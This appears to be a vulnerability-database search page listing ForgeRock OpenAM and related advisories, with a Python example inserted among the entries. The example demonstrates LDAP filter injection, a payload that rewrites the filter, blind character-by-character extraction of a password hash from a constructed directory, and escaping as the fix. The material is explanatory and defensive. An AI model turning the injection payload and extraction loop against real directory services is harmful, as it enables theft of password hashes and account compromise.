161 matches found
ForgeRock OpenAM <7.0 - Remote Code Execution
ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. Exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/ request to the server. The vulnerabilit...
LDAP Injection In OpenAM
OpenAM contains an LDAP injection vulnerability. When a user tries to reset their password, they are asked to enter a username, and the backend then checks whether that user exists via an LDAP query. If the user exists, a password reset token is sent to the user's email address. Enumeration ca...
CVE-2025-20628 Insufficient granularity of access control for Remote Connector Servers in client mode
An insufficient granularity of access control vulnerability exists in PingIDM (formerly ForgeRock Identity Management): administrators cannot properly configure access rules for Remote Connector Servers (RCS) running in client mode. This means an attacker can spoof a client-mode RCS if one exists ...
EUVD-2021-23727
Malware in sbrugna...
EUVD-2016-7422
Malware in sbrugna...
EUVD-2021-23728
Malware in sbrugna...
EUVD-2017-5897
Malware in sbrugna...
EUVD-2017-5898
Malware in sbrugna...
EUVD-2020-9417
Malware in sbrugna...
EUVD-2018-19007
Malware in sbrugna...
EUVD-2023-12557
Malicious code in bioql PyPI...
EUVD-2022-43104
Malicious code in bioql PyPI...
EUVD-2023-23885
Malicious code in bioql PyPI...
EUVD-2023-12400
Malicious code in bioql PyPI...
EUVD-2021-34059
Malicious code in bioql PyPI...
EUVD-2023-12622
Malicious code in bioql PyPI...
CVE-2021-37154
In ForgeRock Access Management AM before 7.0.2, the SAML2 implementation allows XML injection, potentially enabling a fraudulent SAML 2.0 assertion...
CVE-2021-37153
ForgeRock Access Management AM before 7.0.2, when configured with Active Directory as the Identity Store, has an authentication-bypass issue...
CVE-2021-29156
ForgeRock OpenAM before 13.5.1 allows LDAP injection via the Webfinger protocol. For example, an unauthenticated attacker can perform character-by-character retrieval of password hashes, or retrieve a session token or a private key...
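The two LDAP injection entries above (the password-reset username lookup, and the Webfinger lookup that allows character-by-character retrieval of password hashes) share one mechanism: an untrusted identifier is concatenated into an LDAP search filter, and the application leaks whether the filter matched. The following is an added example, not OpenAM code, that shows the vulnerable and the RFC 4515-escaped filter side by side, a small in-memory filter evaluator standing in for the directory, and the blind prefix-extraction loop that the boolean oracle makes possible. The directory entries, the `{SSHA}` values, the `(&(uid=...)(objectClass=person))` filter shape and every function name are constructed for illustration.

```python
"""LDAP filter injection as described for the OpenAM password-reset and
Webfinger lookups: a username spliced into a search filter, and the
resulting match/no-match oracle used to read a password hash one
character at a time.  Added example, not OpenAM code; all data is constructed.
"""
import re
import string

# Constructed stand-in for the LDAP identity store behind the lookup.
DIRECTORY = [
    {"objectClass": "person", "uid": "alice", "mail": "alice@example.test",
     "userPassword": "{SSHA}b3JhbmdlcGVwcGVy"},
    {"objectClass": "person", "uid": "bob", "mail": "bob@example.test",
     "userPassword": "{SSHA}Y2xvdWR5c2t5"},
]


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping for a value placed inside an LDAP search filter."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\x00" else c for c in value)


def build_filter_unsafe(username: str) -> str:
    # Vulnerable pattern: untrusted input concatenated straight into the filter.
    return "(&(uid=%s)(objectClass=person))" % username


def build_filter_safe(username: str) -> str:
    # Hardened pattern: the value can no longer close or open a filter component.
    return "(&(uid=%s)(objectClass=person))" % escape_filter_value(username)


# --- minimal filter evaluator: equality with '*' wildcards, plus '&' and '|' ---

def _parse(f: str, i: int):
    if f[i] != "(":
        raise ValueError("expected '(' at %d" % i)
    i += 1
    if f[i] in "&|":
        op, subs, i = f[i], [], i + 1
        while f[i] == "(":
            node, i = _parse(f, i)
            subs.append(node)
        if f[i] != ")":
            raise ValueError("expected ')' at %d" % i)
        return (op, subs), i + 1
    j = f.index(")", i)                      # escaped ')' is '\29', never literal
    attr, _, pattern = f[i:j].partition("=")
    return ("=", attr, pattern), j + 1


def _unescape(s: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def _matches(pattern: str, actual: str) -> bool:
    # Only an unescaped '*' is a wildcard; '\2a' is a literal asterisk.
    regex = ".*".join(re.escape(_unescape(p)) for p in pattern.split("*"))
    return re.fullmatch(regex, actual) is not None


def _eval(node, entry) -> bool:
    if node[0] == "&":
        return all(_eval(n, entry) for n in node[1])
    if node[0] == "|":
        return any(_eval(n, entry) for n in node[1])
    _, attr, pattern = node
    return attr in entry and _matches(pattern, entry[attr])


def search(filter_str: str):
    node, end = _parse(filter_str, 0)
    if end != len(filter_str):
        raise ValueError("trailing data after filter")
    return [e for e in DIRECTORY if _eval(node, e)]


def user_exists(username: str, safe: bool) -> bool:
    """The oracle: 'reset token sent' versus 'no such user', i.e. did the filter match."""
    build = build_filter_safe if safe else build_filter_unsafe
    return bool(search(build(username)))


def extract_password_hash(username: str,
                          alphabet: str = string.ascii_letters + string.digits + "{}+/=") -> str:
    """Character-by-character recovery through the unsafe lookup.

    Each probe turns (&(uid=USER)(objectClass=person)) into
    (&(uid=USER)(userPassword=KNOWNc*)(objectClass=person)); a match means
    KNOWNc is a prefix of the stored hash.  The loop ends when no character
    extends the prefix, i.e. the whole attribute value has been read.
    """
    known = ""
    while True:
        for ch in alphabet:
            payload = "%s)(userPassword=%s*" % (username, escape_filter_value(known + ch))
            if user_exists(payload, safe=False):
                known += ch
                break
        else:
            return known


if __name__ == "__main__":
    print(build_filter_unsafe("alice)(userPassword=*"))
    print(build_filter_safe("alice)(userPassword=*"))
    print(extract_password_hash("alice"))
```

The same payload that rewrites the filter's structure through `build_filter_unsafe` is reduced to an inert literal by `build_filter_safe`, which is the whole fix: escape on the way into the filter rather than blacklisting characters on the way in from the request. In a real deployment the oracle would be the difference between "token sent" and "unknown user" (or, for Webfinger, between a populated and an empty response), and response-time differences can serve the same purpose even when the body is identical.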
CVE-2020-17465
Dashboards and progressiveProfileForms in ForgeRock Identity Manager before 7.0.0 are vulnerable to stored XSS. The vulnerability affects versions 6.5.0.4, 6.0.0.6...